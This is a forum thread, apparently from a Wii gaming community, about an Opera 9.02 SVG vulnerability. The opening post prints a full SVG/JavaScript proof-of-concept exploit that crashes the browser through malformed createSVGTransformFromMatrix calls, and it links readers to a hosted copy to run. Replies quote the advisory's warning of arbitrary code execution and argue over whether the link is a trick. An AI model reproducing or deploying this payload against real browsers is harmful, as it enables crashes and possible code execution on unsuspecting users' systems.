Opera Browser Is Vulnerable! Exploit -> Crash

T

ToadIsDoingMagicMushrooms

Banned
Dec 4, 2006
851
1
Northern Ireland - Co. Down
Wii Online Code
8263-8201-5467-9061
There's a new Opera vulnerability out for 9.02 (the version the Wii runs) that it appears the wii is susceptible to as well. The vulnerability disclosure is here - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=458

The code was created by Jumper and is as follows:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg id="mySVG" width="100%" height="100%" version="1.1"
xmlns="http://www.w3.org/2000/svg">

<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:1;
stroke:rgb(0,0,0)"/>

<script>
var svg = document.getElementById("mySVG");
var matrix = svg.createSVGMatrix();
var i=0xffffffff, randomObject = {a:i,b:i,c:i,d:i,e:i,f:i};

try{
svg.createSVGTransformFromMatrix(matrix);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(randomObject);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(null);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(i);
}catch(e){}
try{
svg.createSVGTransformFromMatrix(new Array(i));
}catch(e){}
</script>

</svg>



Test it here: http://www.thehumancircus.org/test.svg
 
Last edited:
III. ANALYSIS
Exploitation of this vulnerability would allow an attacker to execute arbitrary code on the affected host. The attacker would first need to construct a website containing the malicious JavaScript and trick the vulnerable user into visiting the site. This would trigger the vulnerability and allow the code to execute with the privileges of the local user.
Click to expand...

Why would anyone go to that site. Your so stupid, do you even know what this is. If one were to go to the site then their Wii would be hacked by a remote user who made this code. Can someone ban this guy who is trying to trick other ignorant people who don't check what they click.
 
  • Thread Starter
  • Thread starter
  • #5
Bulldogxx831 said:
Why would anyone go to that site. Your so stupid, do you even know what this is. If one were to go to the site then their Wii would be hacked by a remote user who made this code. Can someone ban this guy who is trying to trick other ignorant people who don't check what they click.
Click to expand...

Actually its a test one which has been edited to be safe and will just cause your system to reset. Think about it!
 
You must log in or register to reply here.

Latest posts

Back
Top